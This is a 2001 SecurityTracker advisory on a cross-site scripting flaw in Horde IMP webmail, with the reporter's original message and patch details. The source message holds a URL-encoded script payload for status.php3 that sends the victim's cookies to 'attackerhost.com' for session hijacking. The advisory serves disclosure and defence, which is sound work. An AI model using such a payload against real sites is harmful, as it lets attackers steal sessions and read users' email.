SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (E-mail Server)  >   Horde Internet Messaging Program (IMP) Vendors:   Horde Project
Horde Internet Messaging Program (IMP) Cross-Site Scripting Flaw Lets Remote Users Steal Session Cookies and Hijack E-mail Sessions
SecurityTracker Alert ID:  1002726
SecurityTracker URL:  http://securitytracker.com/id/1002726
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Nov 9 2001
Impact:   Disclosure of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): All stable versions up through 2.2.6
Description:   A cross-site scripting vulnerability has been reported in the Horde Project Internet Messaging Program (IMP). A remote user can potentially hijack an IMP session.

It is reported that a remote user can create a malicious HTML-based e-mail message such that, when the message is viewed, arbitrary code is executed by the target user's browser. The code will appear to originate from the mail server and will be able to access the user's web mail cookies and forward those cookies to another location.

After obtaining the cookies, the remote user can then hijack the session and read the target user's email.

It is reported that the development version 2.3 and 3.0 Release Candidate 1 are not affected by this vulnerability.

The vendor has reportedly been notified.

A demonstration exploit URL is provided in the Source Message.

Impact:   A remote user can hijack another user's email session.
Solution:   A new version is pending and will be available shortly. A patch is available. The author of the report states that you can apply the patch using:

http://cvs.horde.org/diff.php/imp/Attic/status.php3?r1=2.7.2.22&r2=2.7.2.23&ty=u

or just escape the $message variable
$message = htmlspecialchars($message);
if your imp installation is already heavily customized.

Vendor URL:  www.horde.org/imp/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Vendor Issues Fix) Re: Horde Internet Messaging Program (IMP) Cross-Site Scripting Flaw Lets Remote Users Steal Session Cookies and Hijack E-mail Sessions
This is a follow-up message.
(Conectiva Issues Fix) Re: Horde Internet Messaging Program (IMP) Cross-Site Scripting Flaw Lets Remote Users Steal Session Cookies and Hijack E-mail Sessions
The vendor has released a fix.
(Caldera Issues Fix) Horde Internet Messaging Program (IMP) Cross-Site Scripting Flaw Lets Remote Users Steal Session Cookies and Hijack E-mail Sessions
The vendor has released a fix.



 Source Message Contents

Subject:  Imp Webmail session hijacking vulnerability


- After hijacking the cookies, the attacker can use the session and read 
- Imp webmail is part of the Horde Application Framework, at

- Imp is included in the Linux Madrake, Conectiva Distributions. 

- It's used in several webmail sites, some of which
- All stable imp webmail versions, up to 2.2.6 including are vulnerable, the 
devel version, 2.3 and 3.0 Release Candidate 1 are not affected by this 
vulnerability.
- The horde team was warned about this and have commited a fix,
- To apply the patch use
http://cvs.horde.org/diff.php/imp/Attic/status.php3?r1=2.7.2.22&r2=2.7.2.23&ty=u
- To exploit this vulnerability using a text message, the attacker sends an
http://myimp.site.com/status.php3?message=%3Cscript%20language%3Djavascript
%3E%20document.write(%27%3Cimg%20src%3Dhttp%3A%2F%2Fattackerhost.co
m%2Fcookie.cgi%3Fcookie%3D%27%20%2B%20escape(document.cookie)%2B%
20%27%3E%27)%3B%3C%2Fscript%3E%0A
which in return redirects the user's browser to the attacker's server where 
he hijacks the cookies that the browser used in the context of the webmail 
site, and the session therefore.
This attack is just one more example on how trusting user input is a Bad 
Thing(tm), as well as the risks inherent to cross-site script attacks.
cookie-based session sites, after reading about the MS Wallet attack and saw 
how almost 2 years after the CERT advisory on these techniques, lots of 
applications are still vulnerable. There are probably lots of kids around 
exploiting similar vulnerabilities. So check your web applications for 
similar vulnerabilities and ask yourself how many times have you pasted
directly into the html some variable passed by the url or cookie.

- For more info on cross-site scripting, read CERT advisory and 
Imp Project homepage:
http://www.horde.org/imp/
Marc Slemko's "Microsoft Passport to Trouble":
http://alive.znep.com/~marcs/passport/
CERT advisory on cross-site scripting
http://www.cert.org/advisories/CA-2000-02.html

megas@phibernet.org
Phibernet Information Network

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC